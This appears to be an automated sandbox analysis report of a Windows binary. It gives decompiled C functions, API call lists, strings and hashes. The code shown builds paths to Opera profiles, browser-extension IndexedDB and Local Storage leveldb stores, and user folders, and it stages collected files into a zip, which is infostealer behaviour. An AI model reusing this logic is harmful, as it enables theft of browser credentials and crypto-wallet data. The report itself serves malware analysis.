										_push( &_v2788);
									} else {
										_push( &_v1528);
									}
									if( *0x4647d0() != 0) {
										_v8128 = 1;
									}
									_t211 = E0042CE7D(_t223,  &_v8144, _t288, 0, ":",  &_v8144);
									_t289 = _t211;
									_t293 = _t293 + 0xc;
								} while (_t289 != 0);
								if(_v8128 != _t211) {
									L32:
									_t288 = _v8120;
									L33:
									_t269 = _a20;
									if(_a20 == 0) {
										goto L37;
									}
									_t156 = _a48;
									_t233 = _a44;
									if(_a48 > _a44) {
										break;
									}
									if(_v8128 == 0) {
										E0040BC20(_v8116,  &_v2788,  &_v528, _v8132, _t269, _t223, _v8140, _a32, _a36, _a40, _t233, _t156 + 1); // executed
										_t293 = _t293 + 0x30;
									}
									goto L37;
								}
								goto L23;
							}
						}
					}
					_t295 = _t293 - 0x1c;
					_t289 = _t295;
					_v8148 = _t295;
					 *((intOrPtr*)(_t289 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t289 + 0x10)) = 0;
					 *_t289 = 0;
					E00404BC0(_t289,  &_v528, E0042BC70( &_v528));
					_t222 = E0040B880(_t301);
					_t293 = _t295 + 0x20;
					if(_t222 != 0) {
						goto L37;
					}
					goto L7;
					L37:
					_t139 = FindNextFileA(_v8136,  &_v8108); // executed
				} while (_t139 != 0);
				_t264 = _v8136;
				_t135 = FindClose(_v8136);
				goto L39;
			}

0x0040bc28
0x0040bc2d
0x0040bc34
0x0040bc3f
0x0040bc43
0x0040bc46
0x0040bc4c
0x0040bc5c
0x0040bc62
0x0040bc68
0x0040bc6e
0x0040bc74
0x0040bc8b
0x0040bc96
0x0040bc9c
0x0040bca1
0x0040bca7
0x0040bcac
0x0040bcb7
0x0040bcbd
0x0040bcca
0x0040c058
0x0040c068
0x0040c068
0x0040bcd0
0x0040bcd3
0x0040bcd3
0x0040bcde
0x0040bce7
0x00000000
0x00000000
0x0040bced
0x0040bcf8
0x0040bd01
0x00000000
0x00000000
0x0040bd07
0x0040bd13
0x0040bd18
0x0040bd1d
0x00000000
0x00000000
0x0040bd2b
0x0040bd3d
0x0040bd51
0x0040bd57
0x0040bd5b
0x0040bda7
0x0040bdb5
0x0040bdc8
0x0040bdcd
0x0040bdd0
0x0040bdd5
0x0040bdde
0x0040be12
0x0040be18
0x0040bde0
0x0040bdf3
0x0040bdf9
0x0040bdf9
0x0040be21
0x0040be2b
0x0040c138
0x0040c13c
0x0040c25e
0x0040c26c
0x0040c272
0x0040c274
0x00000000
0x00000000
0x0040c282
0x0040c294
0x0040c2a8
0x0040c2ae
0x0040c2ce
0x0040c2d0
0x0040c2d2
0x00000000
0x00000000
0x0040c2d8
0x0040c2dd
0x0040c2e3
0x00000000
0x00000000
0x0040c2f5
0x0040c2fa
0x0040c2fd
0x0040c2ff
0x00000000
0x00000000
0x0040c305
0x0040c30b
0x0040c236
0x0040c236
0x0040c23a
0x0040c240
0x0040c241
0x0040c243
0x0040c243
0x0040c249
0x0040c24a
0x0040c24b
0x0040c250
0x0040c253
0x00000000
0x0040c253
0x0040c14e
0x0040c154
0x0040c156
0x00000000
0x00000000
0x0040c15e
0x0040c172
0x0040c177
0x0040c17a
0x0040c18e
0x0040c194
0x0040c196
0x00000000
0x00000000
0x0040c1a4
0x0040c1b6
0x0040c1d1
0x0040c1d7
0x0040c1f7
0x0040c1f9
0x0040c1fb
0x00000000
0x00000000
0x0040c201
0x0040c206
0x0040c20c
0x00000000
0x00000000
0x0040c21e
0x0040c223
0x0040c226
0x0040c228
0x00000000
0x00000000
0x0040c22e
0x0040c234
0x00000000
0x0040be31
0x0040be44
0x0040be49
0x0040be4b
0x0040be4e
0x0040be50
0x0040be59
0x0040be73
0x0040be78
0x0040be8c
0x0040be91
0x0040be94
0x0040be94
0x0040be9c
0x0040bef3
0x0040bef5
0x0040c077
0x0040c07d
0x0040c07f
0x00000000
0x00000000
0x0040c093
0x0040c0a5
0x0040c0b9
0x0040c0bf
0x0040c0df
0x0040c0e1
0x0040c0e3
0x00000000
0x00000000
0x0040c0e9
0x0040c0ee
0x0040c0f4
0x00000000
0x00000000
0x0040c106
0x0040c10b
0x0040c10e
0x0040c110
0x00000000
0x00000000
0x0040c116
0x0040c11a
0x0040c120
0x0040c126
0x0040c127
0x0040c129
0x0040c12b
0x0040c12b
0x0040c131
0x0040c132
0x0040bfc5
0x0040bfc5
0x0040bfca
0x0040bfcd
0x00000000
0x0040bfcd
0x0040bf11
0x00000000
0x00000000
0x0040bf25
0x0040bf37
0x0040bf52
0x0040bf78
0x0040bf7c
0x00000000
0x00000000
0x0040bf7e
0x0040bf84
0x0040bf8a
0x00000000
0x00000000
0x0040bf9c
0x0040bfa1
0x0040bfa6
0x00000000
0x00000000
0x0040bfac
0x0040bfb2
0x0040bfb8
0x0040bfb9
0x0040bfbb
0x0040bfbd
0x0040bfbd
0x0040bfc3
0x0040bfc4
0x00000000
0x0040bea0
0x0040bea0
0x0040bea0
0x0040bea2
0x0040bea5
0x0040beb6
0x0040bea7
0x0040bead
0x0040bead
0x0040bebf
0x0040bec1
0x0040bec1
0x0040bed9
0x0040bede
0x0040bee0
0x0040bee3
0x0040beed
0x0040bfd3
0x0040bfd3
0x0040bfd9
0x0040bfd9
0x0040bfde
0x00000000
0x00000000
0x0040bfe0
0x0040bfe3
0x0040bfe8
0x00000000
0x00000000
0x0040bff1
0x0040c027
0x0040c02c
0x0040c02c
0x00000000
0x0040bff1
0x00000000
0x0040beed
0x0040be9c
0x0040be2b
0x0040bd5d
0x0040bd60
0x0040bd68
0x0040bd6e
0x0040bd75
0x0040bd7d
0x0040bd92
0x0040bd97
0x0040bd9c
0x0040bda1
0x00000000
0x00000000
0x00000000
0x0040c02f
0x0040c03d
0x0040c043
0x0040c04b
0x0040c052
0x00000000

APIs

wsprintfA.USER32 ref: 0040BC74
FindFirstFileA.KERNEL32(?,?), ref: 0040BC8B
_memset.LIBCMT ref: 0040BCA7
lstrcat.KERNEL32(?,?), ref: 0040BCB7
StrCmpCA.SHLWAPI(?,004456B0), ref: 0040BCDF
StrCmpCA.SHLWAPI(?,004456AC), ref: 0040BCF9
lstrcpy.KERNEL32(?,?), ref: 0040BD2B
lstrcat.KERNEL32(?,00443C68), ref: 0040BD3D
lstrcat.KERNEL32(?,?), ref: 0040BD51
_strlen.LIBCMT ref: 0040BD80

Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B8D3
Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B8F7
Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B919
Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B93E
Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B95F
Part of subcall function 0040B880: _strlen.LIBCMT ref: 0040B980

_memset.LIBCMT ref: 0040BDB5
_memset.LIBCMT ref: 0040BDC8
StrCmpCA.SHLWAPI(?,00443C1C), ref: 0040BDD6
wsprintfA.USER32 ref: 0040BDF3
wsprintfA.USER32 ref: 0040BE12
lstrlen.KERNEL32(?), ref: 0040BE22
_strtok_s.LIBCMT ref: 0040BE44
PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 0040BE67
CoInitialize.OLE32(00000000), ref: 0040BE78
_strtok_s.LIBCMT ref: 0040BED9
PathMatchSpecA.SHLWAPI(?,?), ref: 0040BF09
lstrcpy.KERNEL32(?,?), ref: 0040BF25
lstrcat.KERNEL32(?,00443C68), ref: 0040BF37
PathFindFileNameA.SHLWAPI(?), ref: 0040BF44
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040BF73

Part of subcall function 00409D50: CloseHandle.KERNEL32(?), ref: 00409E88
Part of subcall function 00409D50: CloseHandle.KERNEL32(?), ref: 00409E92
Part of subcall function 00409D50: _free.LIBCMT ref: 00409E99

lstrcat.KERNEL32(?,00000000), ref: 0040BF52

Part of subcall function 004205F0: CreateFileA.KERNEL32(0040C2C0,80000000,00000003,00000000,00000003,00000080,00000000,?,0040C2C0,?), ref: 0042060D
Part of subcall function 004205F0: GetFileSizeEx.KERNEL32(00000000,?), ref: 0042061F
Part of subcall function 004205F0: CloseHandle.KERNEL32(00000000), ref: 0042062A

FindNextFileA.KERNELBASE(?,?), ref: 0040C03D
FindClose.KERNEL32(?), ref: 0040C052
PathMatchSpecA.SHLWAPI(?,?), ref: 0040C077
lstrcpy.KERNEL32(?,?), ref: 0040C093
lstrcat.KERNEL32(?,00443C68), ref: 0040C0A5
lstrcat.KERNEL32(?,?), ref: 0040C0B9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C0DA
PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 0040C14E
CoInitialize.OLE32(00000000), ref: 0040C15E
PathMatchSpecA.SHLWAPI(?,?), ref: 0040C18E
lstrcpy.KERNEL32(?,?), ref: 0040C1A4
lstrcat.KERNEL32(?,00443C68), ref: 0040C1B6
PathFindFileNameA.SHLWAPI(?), ref: 0040C1C3
lstrcat.KERNEL32(?,00000000), ref: 0040C1D1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C1F2

Part of subcall function 00409D50: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409D7A
Part of subcall function 00409D50: GetLastError.KERNEL32 ref: 00409D88
Part of subcall function 00409D50: _malloc.LIBCMT ref: 00409D9D
Part of subcall function 00409D50: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,00000000), ref: 00409DB8
Part of subcall function 00409D50: GetCurrentProcess.KERNEL32(0002000E,?), ref: 00409DD4
Part of subcall function 00409D50: OpenProcessToken.ADVAPI32(00000000), ref: 00409DDB
Part of subcall function 00409D50: DuplicateToken.ADVAPI32(?,00000002,?), ref: 00409DF6
Part of subcall function 00409D50: MapGenericMask.ADVAPI32(?,?), ref: 00409E4F
Part of subcall function 00409D50: AccessCheck.ADVAPI32(00000000,?,001200A0,00120089,?,00000014,?,?), ref: 00409E72

PathMatchSpecA.SHLWAPI(?,?), ref: 0040C26C
lstrcpy.KERNEL32(?,?), ref: 0040C282
lstrcat.KERNEL32(?,00443C68), ref: 0040C294
lstrcat.KERNEL32(?,?), ref: 0040C2A8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040C2C9

Strings

*.lnk, xrefs: 0040BE5B, 0040C142
%s\%s, xrefs: 0040BE0C
%s\*, xrefs: 0040BC56

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$FilePath$_strlen$MatchSpec$Findlstrcpy$CloseUnothrow_t@std@@@__ehfuncinfo$??2@$Handle_memsetwsprintf$InitializeNameProcessSecurityToken_strtok_s$AccessCheckCreateCurrentDuplicateErrorFirstGenericLastMaskNextOpenSize_free_malloclstrlen
String ID: %s\%s$%s\*$*.lnk
API String ID: 3298867807-1856930566
Opcode ID: 061a66c9d1cabf02caf5ae008fffd8c5c49884ed73cf0b0a3bbda700a41f1aef
Instruction ID: f7dc33c950da5ec326fe471d2e9467167204e800e72d18a4a02f0c96c2c4339e
Opcode Fuzzy Hash: 061a66c9d1cabf02caf5ae008fffd8c5c49884ed73cf0b0a3bbda700a41f1aef
Instruction Fuzzy Hash: 6402877690021AABDB24DB60DC84FEF7378EB84705F1445B9F509A3181EB789E84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00416B10 Relevance: 77.4, APIs: 36, Strings: 8, Instructions: 442
filestringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00416B10(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				char _v1048;
				char _v1308;
				char _v1568;
				char _v1828;
				char _v2088;
				char _v2348;
				char _v2608;
				struct _WIN32_FIND_DATAA _v2928;
				void* _v2929;
				intOrPtr _v2936;
				intOrPtr _v2940;
				void* _v2944;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t119;
				void* _t125;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t146;
				void* _t148;
				void* _t151;
				void* _t156;
				void* _t159;
				int _t165;
				intOrPtr _t186;
				void* _t197;
				void* _t204;
				void* _t208;
				void* _t211;
				intOrPtr _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t301;
				intOrPtr _t302;
				signed int _t303;
				void* _t304;
				void* _t305;
				void* _t313;

				_t119 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t119 ^ _t303;
				_t302 = _a4;
				_t301 = _a12;
				_t211 = __ecx;
				_t266 =  &_v2348;
				_v2940 = _a8;
				_v2936 = _a16;
				wsprintfA( &_v2348, "%s\\*.*", _t301);
				_t305 = _t304 + 0xc;
				if(_a24 != 0) {
					E0042A2F0( &_v268, 0, 0x104);
					_t125 = _a24 - 1;
					if(_t125 == 0) {
						_push("Opera Stable");
						_push( &_v268);
						goto L22;
					} else {
						_t159 = _t125 - 1;
						if(_t159 == 0) {
							_push("Opera GX Stable");
							_push( &_v268);
							goto L22;
						} else {
							if(_t159 == 1) {
								_push("Opera Crypto Stable");
								_push( &_v268);
								L22:
								 *0x464860();
							}
						}
					}
					_t127 =  *0x453968; // 0x25c6c50
					wsprintfA( &_v528, "%s\\%s\\%s\\%s", _t301,  &_v268, _t127, _t302);
					_t129 =  *0x453374; // 0x25c0598
					wsprintfA( &_v1308, "%s\\%s",  &_v528, _t129);
					_t131 =  *0x4537c8; // 0x25c9708
					wsprintfA( &_v788, "%s\\%s\\%s\\%s", _t301,  &_v268, _t131, _t302);
					_t133 =  *0x453374; // 0x25c0598
					wsprintfA( &_v1828, "%s\\%s",  &_v788, _t133);
					_t135 =  *0x453474; // 0x25c9d00
					wsprintfA( &_v1048, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t301,  &_v268, _t135, _t302);
					_t137 =  *0x453374; // 0x25c0598
					wsprintfA( &_v1568, "%s\\%s",  &_v1048, _t137);
					_t301 = _a20;
					if(_a28 != 0) {
						_t156 = E004205C0( &_v1308); // executed
						if(_t156 != 0) {
							_push(_t302);
							E00416770(_t211,  &_v528, _v2940, _v2936,  &_v268, _t301, 1);
						}
					}
					if(_a32 != 0) {
						_t151 = E004205C0( &_v1828); // executed
						if(_t151 != 0) {
							_push(_t302);
							E00416770(_t211,  &_v788, _v2940, _v2936,  &_v268, _t301, 2);
						}
					}
					if(_a36 != 0) {
						_t148 = E004205C0( &_v1568); // executed
						if(_t148 != 0) {
							_push(_t302);
							E00416770(_t211,  &_v1048, _v2940, _v2936,  &_v268, _t301, 3);
						}
					}
					E0042A2F0( &_v528, 0, 0x104);
					E0042A2F0( &_v1308, 0, 0x104);
					E0042A2F0( &_v788, 0, 0x104);
					E0042A2F0( &_v1828, 0, 0x104);
					E0042A2F0( &_v1048, 0, 0x104);
					_t266 =  &_v1568;
					_t146 = E0042A2F0( &_v1568, 0, 0x104);
					goto L33;
				} else {
					_t146 = FindFirstFileA( &_v2348,  &_v2928); // executed
					_v2944 = _t146;
					if(_t146 == 0xffffffff) {
						L33:
						return E0042A36A(_t146, _t211, _v8 ^ _t303, _t266, _t301, _t302);
					} else {
						do {
							_push(".");
							_push( &(_v2928.cFileName));
							if( *0x464890() != 0) {
								_push("..");
								_push( &(_v2928.cFileName));
								if( *0x464890() != 0) {
									E0042A2F0( &_v268, 0, 0x104);
									 *0x464860( &_v268,  &(_v2928.cFileName));
									_t241 =  *0x453968; // 0x25c6c50
									wsprintfA( &_v1048, "%s\\%s\\%s\\%s", _t301,  &_v268, _t241, _t302);
									_t242 =  *0x453374; // 0x25c0598
									wsprintfA( &_v1568, "%s\\%s",  &_v1048, _t242);
									_t243 =  *0x4537c8; // 0x25c9708
									wsprintfA( &_v788, "%s\\%s\\%s\\%s", _t301,  &_v268, _t243, _t302);
									_t244 =  *0x453374; // 0x25c0598
									wsprintfA( &_v1828, "%s\\%s",  &_v788, _t244);
									_t245 =  *0x453474; // 0x25c9d00
									wsprintfA( &_v528, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t301,  &_v268, _t245, _t302);
									_t246 =  *0x453374; // 0x25c0598
									wsprintfA( &_v1308, "%s\\%s",  &_v528, _t246);
									wsprintfA( &_v2088, "%s\\%s\\Local Storage\\leveldb", _t301,  &_v268);
									_t186 =  *0x453374; // 0x25c0598
									wsprintfA( &_v2608, "%s\\%s",  &_v2088, _t186);
									_t313 = _t305 + 0xa4;
									if(_a28 != 0) {
										_t208 = E004205C0( &_v1568); // executed
										if(_t208 != 0) {
											_push(_t302);
											E00416770(_t211,  &_v1048, _v2940, _v2936,  &_v268, _a20, 1);
										}
									}
									if(_a32 != 0) {
										_t204 = E004205C0( &_v1828); // executed
										if(_t204 != 0) {
											_push(_t302);
											E00416770(_t211,  &_v788, _v2940, _v2936,  &_v268, _a20, 2);
										}
									}
									if(_a36 != 0) {
										_t197 = E004205C0( &_v1308); // executed
										if(_t197 != 0) {
											_push(_t302);
											E00416770(_t211,  &_v528, _v2940, _v2936,  &_v268, _a20, 3);
											_push(_t302);
											E00416770(_t211,  &_v2088, _v2940, _v2936,  &_v268, _a20, 4);
										}
									}
									E0042A2F0( &_v1048, 0, 0x104);
									E0042A2F0( &_v1568, 0, 0x104);
									E0042A2F0( &_v788, 0, 0x104);
									E0042A2F0( &_v1828, 0, 0x104);
									E0042A2F0( &_v528, 0, 0x104);
									E0042A2F0( &_v1308, 0, 0x104);
									_t305 = _t313 + 0x48;
								}
							}
							_t165 = FindNextFileA(_v2944,  &_v2928); // executed
						} while (_t165 != 0);
						return E0042A36A(FindClose(_v2944), _t211, _v8 ^ _t303,  &_v2928, _t301, _t302);
					}
				}
			}

0x00416b19
0x00416b20
0x00416b28
0x00416b2c
0x00416b30
0x00416b35
0x00416b41
0x00416b47
0x00416b4d
0x00416b53
0x00416b5a
0x00416ea4
0x00416eaf
0x00416eb0
0x00416ed4
0x00416edf
0x00000000
0x00416eb2
0x00416eb2
0x00416eb3
0x00416ec6
0x00416ed1
0x00000000
0x00416eb5
0x00416eb6
0x00416eb8
0x00416ec3
0x00416ee0
0x00416ee0
0x00416ee0
0x00416eb6
0x00416eb3
0x00416ee6
0x00416f01
0x00416f07
0x00416f20
0x00416f26
0x00416f41
0x00416f47
0x00416f63
0x00416f69
0x00416f84
0x00416f8a
0x00416fa3
0x00416fa9
0x00416fb3
0x00416fc2
0x00416fc9
0x00416fd7
0x00416fed
0x00416fed
0x00416fc9
0x00416ff6
0x00417005
0x0041700c
0x0041701a
0x00417030
0x00417030
0x0041700c
0x00417039
0x00417048
0x0041704f
0x0041705d
0x00417073
0x00417073
0x0041704f
0x00417086
0x00417099
0x004170ac
0x004170bf
0x004170d2
0x004170dc
0x004170e5
0x00000000
0x00416b60
0x00416b6e
0x00416b74
0x00416b7d
0x004170ed
0x004170fd
0x00416b83
0x00416b83
0x00416b83
0x00416b8e
0x00416b97
0x00416b9d
0x00416ba8
0x00416bb1
0x00416bc5
0x00416bdb
0x00416be1
0x00416bfd
0x00416c03
0x00416c1d
0x00416c23
0x00416c3f
0x00416c45
0x00416c62
0x00416c68
0x00416c84
0x00416c8a
0x00416ca4
0x00416cbe
0x00416cc4
0x00416ce0
0x00416ce6
0x00416ced
0x00416cfc
0x00416d03
0x00416d0e
0x00416d2a
0x00416d2a
0x00416d03
0x00416d33
0x00416d42
0x00416d49
0x00416d54
0x00416d70
0x00416d70
0x00416d49
0x00416d79
0x00416d88
0x00416d8f
0x00416d9a
0x00416db6
0x00416dc4
0x00416de0
0x00416de0
0x00416d8f
0x00416df3
0x00416e06
0x00416e19
0x00416e2c
0x00416e3f
0x00416e52
0x00416e57
0x00416e57
0x00416bb1
0x00416e68
0x00416e6e
0x00416e93
0x00416e93
0x00416b7d

APIs

wsprintfA.USER32 ref: 00416B4D
FindFirstFileA.KERNEL32(?,?), ref: 00416B6E
StrCmpCA.SHLWAPI(?,004456B0), ref: 00416B8F
StrCmpCA.SHLWAPI(?,004456AC), ref: 00416BA9
_memset.LIBCMT ref: 00416BC5
lstrcat.KERNEL32(?,?), ref: 00416BDB
wsprintfA.USER32 ref: 00416BFD
wsprintfA.USER32 ref: 00416C1D
wsprintfA.USER32 ref: 00416C3F
wsprintfA.USER32 ref: 00416C62
wsprintfA.USER32 ref: 00416C84
wsprintfA.USER32 ref: 00416CA4
wsprintfA.USER32 ref: 00416CBE
wsprintfA.USER32 ref: 00416CE0
_memset.LIBCMT ref: 00416DF3
_memset.LIBCMT ref: 00416E06
_memset.LIBCMT ref: 00416E19
_memset.LIBCMT ref: 00416E2C
_memset.LIBCMT ref: 00416E3F
_memset.LIBCMT ref: 00416E52

Part of subcall function 004205C0: GetFileAttributesA.KERNEL32(0040B658,?,0040B658,?), ref: 004205C7

Part of subcall function 00416770: wsprintfA.USER32 ref: 004167AB
Part of subcall function 00416770: FindFirstFileA.KERNEL32(?,?), ref: 004167C2
Part of subcall function 00416770: StrCmpCA.SHLWAPI(?,004456B0), ref: 004167F5
Part of subcall function 00416770: StrCmpCA.SHLWAPI(?,004456AC), ref: 0041680F
Part of subcall function 00416770: _memset.LIBCMT ref: 0041682B
Part of subcall function 00416770: _memset.LIBCMT ref: 0041683E
Part of subcall function 00416770: lstrcat.KERNEL32(?,?), ref: 0041684E
Part of subcall function 00416770: lstrcat.KERNEL32(?,00443C68), ref: 00416860
Part of subcall function 00416770: lstrcat.KERNEL32(?,?), ref: 00416874
Part of subcall function 00416770: lstrcat.KERNEL32(?,00443C68), ref: 00416886
Part of subcall function 00416770: lstrcat.KERNEL32(?,025C1218), ref: 004168AF
Part of subcall function 00416770: lstrcat.KERNEL32(?,00443C68), ref: 004168C1
Part of subcall function 00416770: lstrcat.KERNEL32(?,00000003), ref: 004168CF
Part of subcall function 00416770: lstrcat.KERNEL32(?,00443C68), ref: 004168E1
Part of subcall function 00416770: lstrcat.KERNEL32(?,025C67D8), ref: 004168EF
Part of subcall function 00416770: lstrcat.KERNEL32(?,00443C68), ref: 00416901

FindNextFileA.KERNEL32(?,?), ref: 00416E68
FindClose.KERNEL32(?), ref: 00416E7D
_memset.LIBCMT ref: 00416EA4
lstrcat.KERNEL32(?,Opera Stable), ref: 00416EE0
wsprintfA.USER32 ref: 00416F01
wsprintfA.USER32 ref: 00416F20
wsprintfA.USER32 ref: 00416F41
wsprintfA.USER32 ref: 00416F63
wsprintfA.USER32 ref: 00416F84
wsprintfA.USER32 ref: 00416FA3
_memset.LIBCMT ref: 00417086
_memset.LIBCMT ref: 00417099
_memset.LIBCMT ref: 004170AC
_memset.LIBCMT ref: 004170BF
_memset.LIBCMT ref: 004170D2
_memset.LIBCMT ref: 004170E5

Strings

Opera GX Stable, xrefs: 00416EC6
Opera Crypto Stable, xrefs: 00416EB8
%s\%s\Local Storage\leveldb, xrefs: 00416CB8
Opera Stable, xrefs: 00416ED4
%s\%s, xrefs: 00416C17, 00416C5C, 00416C9E, 00416CD4, 00416F1A, 00416F5D, 00416F9D
%s\%s\%s\%s, xrefs: 00416BF7, 00416C39, 00416EFB, 00416F3B
%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb, xrefs: 00416C7E, 00416F7E
%s\*.*, xrefs: 00416B3B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memsetwsprintf$lstrcat$FileFind$First$AttributesCloseNext
String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\%s\Local Storage\leveldb$%s\*.*$Opera Crypto Stable$Opera GX Stable$Opera Stable
API String ID: 887468875-1748652064
Opcode ID: f7343a472694a6c622b688d7f3d911ab9922590c1245ab18311a68d81159ecc5
Instruction ID: 7c4705b1f0748bc4ed6acbe3d0bee2b85bc7730b46215c4a34bda5277b536930
Opcode Fuzzy Hash: f7343a472694a6c622b688d7f3d911ab9922590c1245ab18311a68d81159ecc5
Instruction Fuzzy Hash: C6F179B5640218ABDF24DB50DC85FEB737CAB98705F0045DDB609A6181EBB4ABC4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 66.9, APIs: 21, Strings: 17, Instructions: 363
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040D1C0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v120;
				char _v1120;
				char _v2120;
				char _v3120;
				intOrPtr _v3128;
				char _v3132;
				char _v3148;
				intOrPtr _v3156;
				char _v3160;
				char _v3176;
				intOrPtr _v3184;
				char _v3188;
				char _v3204;
				intOrPtr _v3208;
				intOrPtr _v3212;
				intOrPtr _v3216;
				char _v3220;
				intOrPtr _v3224;
				char _v3228;
				char _v3232;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				signed int _t105;
				intOrPtr _t116;
				void* _t128;
				void* _t132;
				intOrPtr* _t133;
				void* _t134;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t148;
				void* _t149;
				signed int _t154;
				void* _t162;
				void* _t163;
				int _t166;
				void* _t169;
				void* _t174;
				void* _t177;
				void* _t183;
				char _t184;
				void* _t185;
				void* _t231;
				intOrPtr _t232;
				signed int _t235;
				void* _t236;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				CHAR* _t243;
				signed int _t244;
				void* _t245;
				void* _t252;
				void* _t253;
				void* _t257;
				void* _t260;
				CHAR _t272;

				_t104 =  *0x451f00; // 0xc21d6f0a
				_t105 = _t104 ^ _t244;
				_v20 = _t105;
				 *[fs:0x0] =  &_v16;
				_t232 = _a12;
				_v3216 = _a16;
				_v3212 = _a24;
				_v3224 = _a28;
				E0042A2F0( &_v3120, 0, 0x3e8);
				E0042A2F0( &_v1120, 0, 0x3e8);
				E0042A2F0( &_v2120, 0, 0x3e8);
				 *0x464860( &_v3120, "\\Files\\", _t105, _t231, _t237, _t183,  *[fs:0x0], E0043E191, 0xffffffff);
				 *0x464860( &_v3120, _a4);
				 *0x464860( &_v3120, ".zip");
				_t116 = E004280E0(0, 0xf4240, 0); // executed
				_t184 = 0;
				_v3208 = _t116;
				_v3220 = 0;
				 *0x46490c( &_v1120, E00420440(_t232, "%APPDATA%", E00420650(0, _t232, _a4, 0x1a)));
				 *0x46490c( &_v1120, E00420440( &_v1120, "%LOCALAPPDATA%", E00420650(0, _t232, _a4, 0x1c)));
				 *0x46490c( &_v1120, E00420440( &_v1120, "%USERPROFILE%", E00420650(0, _t232, _a4, 0x28)));
				_t128 = E0041EDD0();
				_v3128 = 0xf;
				_v3132 = 0;
				_v3148 = 0;
				E00404BC0( &_v3148, _t128, E0042BC70(_t128));
				_v8 = 0;
				_t132 = E00404DB0( &_v3148,  &_v3176, "C:\\Users\\",  &_v3148);
				_v8 = 1;
				_t133 = E0040D0B0( &_v3204,  &_v3204, _t132, "\\Desktop\\");
				_t252 = _t245 - 0xc90 + 0x7c;
				_v8 = 2;
				if( *((intOrPtr*)(_t133 + 0x14)) >= 0x10) {
					_t133 =  *_t133;
				}
				_t134 = E00420440( &_v1120, "%DESKTOP%", _t133);
				_t253 = _t252 + 0xc;
				 *0x46490c( &_v1120, _t134);
				if(_v3184 >= 0x10) {
					_push(_v3204);
					E0042A289();
					_t253 = _t253 + 4;
				}
				_v3184 = 0xf;
				_v3188 = 0;
				_v3204 = 0;
				if(_v3156 >= 0x10) {
					_push(_v3176);
					E0042A289();
					_t253 = _t253 + 4;
				}
				_v3156 = 0xf;
				_v3160 = 0;
				_v3176 = 0;
				_v8 = 0xffffffff;
				if(_v3128 >= 0x10) {
					_push(_v3148);
					E0042A289();
					_t253 = _t253 + 4;
				}
				_v3128 = 0xf;
				_v3132 = 0;
				_v3148 = 0;
				_t137 = E00420650(_t184, _t232, 0x10, 5); // executed
				 *0x46490c( &_v1120, E00420440( &_v1120, "%DOCUMENTS%", _t137));
				_t140 = E00420650(_t184, _t232, 0x10, 0x26); // executed
				 *0x46490c( &_v1120, E00420440( &_v1120, "%PROGRAMFILES%", _t140));
				_t144 = E00420650(_t184, _t232, 0x10, 0x2a); // executed
				 *0x46490c( &_v1120, E00420440( &_v1120, "%PROGRAMFILES_86%", _t144));
				_t148 = E00420650(_t184, _t232, 0x10, 8); // executed
				_t149 = E00420440( &_v1120, "%RECENT%", _t148);
				_t257 = _t253 + 0x40;
				 *0x46490c( &_v1120, _t149);
				_push(0);
				_push("*%DRIVE_FIXED%*");
				_push( &_v1120);
				if( *0x4647d0() != 0) {
					_t184 = 1;
				}
				_push(0);
				_push("*%DRIVE_REMOVABLE%*");
				_push( &_v1120);
				if( *0x4647d0() != 0) {
					_t184 = 1;
					_v3220 = 1;
				}
				_t154 =  *0x4647d0(_t232, "*%RECENT%*", 0);
				asm("sbb edi, edi");
